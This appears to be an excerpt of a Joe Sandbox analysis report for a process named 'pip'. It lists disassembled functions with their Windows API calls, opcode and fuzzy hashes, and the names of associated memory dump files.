Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Exception@8ThrowXweak_mallocstd::exception::exceptionstd::tr1::_
String ID:
API String ID: 2092180293-0
Opcode ID: 3fd82b1acbc8242789e6c97e12a28fa5da0702247a587a04b7f30f5b6ea0a338
Instruction ID: aa47c6a036b33fe6752a0050ba944d44e0f7d31fd5ac351b0a3a50b352172bd5
Opcode Fuzzy Hash: 3fd82b1acbc8242789e6c97e12a28fa5da0702247a587a04b7f30f5b6ea0a338
Instruction Fuzzy Hash: C7A1F4B55047058FC720CF25C48099AB7F6BF88758F248F5EE49A8BB54E770EA48CB81

Uniqueness

Uniqueness Score: -1.00%

Function 6CEF8E20 Relevance: 4.7, APIs: 3, Instructions: 162COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 6CEF8E89
LeaveCriticalSection.KERNEL32(?,00000000), ref: 6CEF8EAD
_memset.LIBCMT ref: 6CEF8ED2

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: CriticalSection$EnterLeave_memset
String ID:
API String ID: 3751686142-0
Opcode ID: 66db8fb9ccccaf9456f9009dc782f65ce975eb9ceee8fd9bfd90a9770eb4ab5d
Instruction ID: 39d557f8438ae15460a6295d25a6c9588bb66e4a73c5b716e5ee20beca063323
Opcode Fuzzy Hash: 66db8fb9ccccaf9456f9009dc782f65ce975eb9ceee8fd9bfd90a9770eb4ab5d
Instruction Fuzzy Hash: 2F519071A012099FD754CF59C890F9AB7B6FF4A304F20815DE92A8B781C731EE56CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6CF03A90 Relevance: 4.6, APIs: 3, Instructions: 130COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CF03B71
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF03B83
SafeArrayDestroy.OLEAUT32(?), ref: 6CF03BCF

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArraySafe$Bound$Destroy
String ID:
API String ID: 3651546500-0
Opcode ID: bcf3e57f4b035a6fb4c20399d05a70761dd60ebc411fa9c6db77195bed970e8f
Instruction ID: 82817acb3d80caf6313673580f028c5d094d74ed816d438d34446950cbc08983
Opcode Fuzzy Hash: bcf3e57f4b035a6fb4c20399d05a70761dd60ebc411fa9c6db77195bed970e8f
Instruction Fuzzy Hash: D941BBB13086019FC601DF19C890E5AF7E9FBD9B58F244E0EF8A4D7650D671E889CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CF069C0 Relevance: 4.6, APIs: 3, Instructions: 128COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CF06A08
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF06A15
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CF06A41

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArraySafe$Bound$Element
String ID:
API String ID: 3836540358-0
Opcode ID: 85920e26e68e58f380d413550c1d9ee7b9b09e3c4763a0822f910cfff656619b
Instruction ID: 92e1cdfd71889d5014368120821542af4d7b8f6dcde96613511acdb7f49e5fea
Opcode Fuzzy Hash: 85920e26e68e58f380d413550c1d9ee7b9b09e3c4763a0822f910cfff656619b
Instruction Fuzzy Hash: 99417C75A0020A9FDB04EF68C891EAF77B9EF49754F208259F921DB680D730E941DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6CEFDFB0 Relevance: 4.6, APIs: 3, Instructions: 120COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CEFDFF6
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEFE003
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEFE02F

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArraySafe$Bound$Element
String ID:
API String ID: 3836540358-0
Opcode ID: 11e7a2c82fb745de3f2b6c527489a61dcd2ab02ed2f2a58daf8d7d42a11d3a81
Instruction ID: 2e865a4cd1962e707cd628f0a79e90ccb42d65f10d16e26a1649fc8a77e117f5
Opcode Fuzzy Hash: 11e7a2c82fb745de3f2b6c527489a61dcd2ab02ed2f2a58daf8d7d42a11d3a81
Instruction Fuzzy Hash: 84413C76A01609DFCB10DF98C8C4EAEB7B9FB49314B204669E535E7390D731AD42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6CEFD9F0 Relevance: 4.6, APIs: 3, Instructions: 81COMMON

Download Yara Rule

APIs

SafeArrayCreateVector.OLEAUT32(0000000D,00000000,000000D5), ref: 6CEFDA16
SafeArrayPutElement.OLEAUT32(00000000,?,00000000), ref: 6CEFDA33
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEFDA9E

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArraySafe$CreateDestroyElementVector
String ID:
API String ID: 3149346722-0
Opcode ID: 484458e842f77d9743211ec852a9c0b07546c2c349622ff6cd5ec7b859b6b64a
Instruction ID: bd4f0b9345a7003e087c5a2fb9921deb4a7c3dbd40353066044928e21904bee4
Opcode Fuzzy Hash: 484458e842f77d9743211ec852a9c0b07546c2c349622ff6cd5ec7b859b6b64a
Instruction Fuzzy Hash: A3215E75305606EFE701DFA9C890B9B7BB8AF4A708F204059E915CB340E771DA12CB65

Uniqueness

Uniqueness Score: -1.00%

Function 6CEFD920 Relevance: 4.6, APIs: 3, Instructions: 81COMMON

Download Yara Rule

APIs

SafeArrayCreateVector.OLEAUT32(0000000D,00000000,00000002), ref: 6CEFD949
SafeArrayPutElement.OLEAUT32(00000000,?,00000000), ref: 6CEFD96C
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEFD9CF

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArraySafe$CreateDestroyElementVector
String ID:
API String ID: 3149346722-0
Opcode ID: 8bfd0ee72ca35c00e09f07359d9534e6bab88968e343c67b5b2a894cc6d2b844
Instruction ID: e0c2fe17be0442455de7c7d13515e6a69d7d93fe1a63ddd75035281c172fa501
Opcode Fuzzy Hash: 8bfd0ee72ca35c00e09f07359d9534e6bab88968e343c67b5b2a894cc6d2b844
Instruction Fuzzy Hash: 63219235601215AFEB02DF95C894FAB7BB8EF8A704F204058E955DB344D7B1DA02DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CF0DB10 Relevance: 4.6, APIs: 3, Instructions: 63COMMON

Download Yara Rule

APIs

SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF0DB2D
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CF0DB45
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF0DBA2

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArraySafe$CreateDestroyElementVector
String ID:
API String ID: 3149346722-0
Opcode ID: 4121d6d0147458b209f13ee6b7675a8f0bbe33698222d2aa3411b49836fcac16
Instruction ID: 53938134c4a5ac41f6823a38b643211fad4b9a7cf5d36b688f6e3b4614e04659
Opcode Fuzzy Hash: 4121d6d0147458b209f13ee6b7675a8f0bbe33698222d2aa3411b49836fcac16
Instruction Fuzzy Hash: AC11BF75745205AFD700DF6AC898FAABBB8FF5A714F058299E918DB341D730A810DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6CF13EB0 Relevance: 3.2, APIs: 2, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 6CF49BB5: _malloc.LIBCMT ref: 6CF49BCF

std::exception::exception.LIBCMT ref: 6CF14042

Part of subcall function 6CF49533: std::exception::_Copy_str.LIBCMT ref: 6CF4954E

__CxxThrowException@8.LIBCMT ref: 6CF14059

Part of subcall function 6CF4AC75: RaiseException.KERNEL32(?,?,6CF49C34,835FE394,?,?,?,?,6CF49C34,835FE394,6CF79C90,6CF8B974,835FE394), ref: 6CF4ACB7

Part of subcall function 6CF49BB5: std::exception::exception.LIBCMT ref: 6CF49C04
Part of subcall function 6CF49BB5: std::exception::exception.LIBCMT ref: 6CF49C1E
Part of subcall function 6CF49BB5: __CxxThrowException@8.LIBCMT ref: 6CF49C2F

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$Copy_strExceptionRaise_mallocstd::exception::_
String ID:
API String ID: 2813683038-0
Opcode ID: c08108dd3b6eba082cfc79c8e593401a356b06fd8dfa8bb5bb6628708c33058b
Instruction ID: a24284227b62bf492c961ebe2ca04ddb1494b0a4417f6ed896e7c8ac6ff14d59
Opcode Fuzzy Hash: c08108dd3b6eba082cfc79c8e593401a356b06fd8dfa8bb5bb6628708c33058b
Instruction Fuzzy Hash: 2091AFB19083049FD700CF59D841B9AFFF8EF94354F25895EE4189BBA0D7B1D6088B92

Uniqueness

Uniqueness Score: -1.00%

Function 6CEFBDF7 Relevance: 3.2, APIs: 2, Instructions: 200COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEFBE2D
IsBadReadPtr.KERNEL32(00000000,00000008,?,?,?), ref: 6CEFBE6D

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArrayDestroyReadSafe
String ID:
API String ID: 616443815-0
Opcode ID: d4782f9667e9a03bf6d9f324c99250f6b06823cb631360dc5380cdf4a6c11650
Instruction ID: 272a98ce2584a7ed6ec3dfc467d603f6f62ae684b3ddadadea62841b791f81bb
Opcode Fuzzy Hash: d4782f9667e9a03bf6d9f324c99250f6b06823cb631360dc5380cdf4a6c11650
Instruction Fuzzy Hash: 2F71EFB1E0469A5EEB218E35CC40659BBB1AB4A32CF38839CD9B597BD6C731D443CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6CEF62C0 Relevance: 3.1, APIs: 2, Instructions: 149COMMON

Download Yara Rule

APIs

Part of subcall function 6CF49BB5: _malloc.LIBCMT ref: 6CF49BCF

std::exception::exception.LIBCMT ref: 6CEF6466

Part of subcall function 6CF49533: std::exception::_Copy_str.LIBCMT ref: 6CF4954E

__CxxThrowException@8.LIBCMT ref: 6CEF647D

Part of subcall function 6CF4AC75: RaiseException.KERNEL32(?,?,6CF49C34,835FE394,?,?,?,?,6CF49C34,835FE394,6CF79C90,6CF8B974,835FE394), ref: 6CF4ACB7

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID:
API String ID: 2299493649-0
Opcode ID: 9a7e4e011620326355d29dd69368c078f044a8d1b90486c7c4948bd366bc79c3
Instruction ID: dc6018b924e3076a7d77ecff99eef4afcb49ecd619cd51cb87e03b0f59b4091c
Opcode Fuzzy Hash: 9a7e4e011620326355d29dd69368c078f044a8d1b90486c7c4948bd366bc79c3
Instruction Fuzzy Hash: 4751A0B29093409FD710CF54C981A4ABBF8FB85704F60892EF5A987B50D7B1DA09CB93

Uniqueness

Uniqueness Score: -1.00%

Function 6CF0D2E0 Relevance: 3.1, APIs: 2, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 6CF49BB5: _malloc.LIBCMT ref: 6CF49BCF

std::exception::exception.LIBCMT ref: 6CF0D3E8
__CxxThrowException@8.LIBCMT ref: 6CF0D3FF

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID:
API String ID: 4063778783-0
Opcode ID: e1113cc8e22ebd88def6548c2da5e7d8b4e458c11c873bb32bac92c8a0f753c3
Instruction ID: dc94c4f0efad11caed95f95f9a8e4e80fd863d3ea85f123636591e335dbcf7cf
Opcode Fuzzy Hash: e1113cc8e22ebd88def6548c2da5e7d8b4e458c11c873bb32bac92c8a0f753c3
Instruction Fuzzy Hash: 3B318E716057059FC704CF28C48099ABBF4FF89714F608A2EF4558BB50E731EA0ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CEF8400 Relevance: 3.0, APIs: 2, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 6CF49BB5: _malloc.LIBCMT ref: 6CF49BCF

std::exception::exception.LIBCMT ref: 6CEF8449
__CxxThrowException@8.LIBCMT ref: 6CEF845E

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID:
API String ID: 4063778783-0
Opcode ID: c81c6f4b5c0327470c9a3dd10a3189601294d4daebda1ada575839ff1a948be5
Instruction ID: cc1e9685418d4abaa01938696a13b4fb3ec3cb525fa24be1eb8a575fa3fdd394
Opcode Fuzzy Hash: c81c6f4b5c0327470c9a3dd10a3189601294d4daebda1ada575839ff1a948be5
Instruction Fuzzy Hash: C901C275A00208AFCB18DF54D490C9ABBF5FF59300B20C1AED92A4BB61DB30EA05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06F8000A Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

Tetq, xrefs: 06F80077
TJyq, xrefs: 06F8008F

Memory Dump Source

Source File: 00000016.00000002.2940861181.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6f80000_pip.jbxd

Similarity

API ID:
String ID: TJyq$Tetq
API String ID: 0-2584179919
Opcode ID: 30323c38960919c622737732049fd892165921b6d38595b4815935f74829e2bb
Instruction ID: 9679cfa7734a324354fb65f5296cf32cbc7c2c057d5eb6cc51797a8c862b9aa9
Opcode Fuzzy Hash: 30323c38960919c622737732049fd892165921b6d38595b4815935f74829e2bb
Instruction Fuzzy Hash: 7731E271B0D3805FC716AB7888646AF7FB6EF86200F4500DAE445DB392CA656D09C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 06F8010E Relevance: 2.6, Strings: 2, Instructions: 78COMMON

Download Yara Rule

Strings

Tetq, xrefs: 06F80156
TJyq, xrefs: 06F8016D

Memory Dump Source

Source File: 00000016.00000002.2940861181.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6f80000_pip.jbxd

Similarity

API ID:
String ID: TJyq$Tetq
API String ID: 0-2584179919
Opcode ID: 8469506ae51da562d5d23e1b808f956e3e37d6080f582e29d2fbcc65fa5346cd
Instruction ID: cdd346d5e7c6ee561d42ee5d2a94486edaa1d445929461176fbab6514903a08f
Opcode Fuzzy Hash: 8469506ae51da562d5d23e1b808f956e3e37d6080f582e29d2fbcc65fa5346cd
Instruction Fuzzy Hash: 0D210830B082456FDB15AB7888546BF7FB6EF85300F1400AEE5469B391CEB56E09C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 6CEF8D60 Relevance: 2.6, APIs: 2, Instructions: 78COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,6CEF8C13,?,6CEF8CD3,?,6CEF8C13,00000000,?,?,6CEF8C13,?,?), ref: 6CEF8D73
LeaveCriticalSection.KERNEL32(?,?,?,6CEF8CD3,?,6CEF8C13,00000000,?,?,6CEF8C13,?,?), ref: 6CEF8D8C

Memory Dump Source

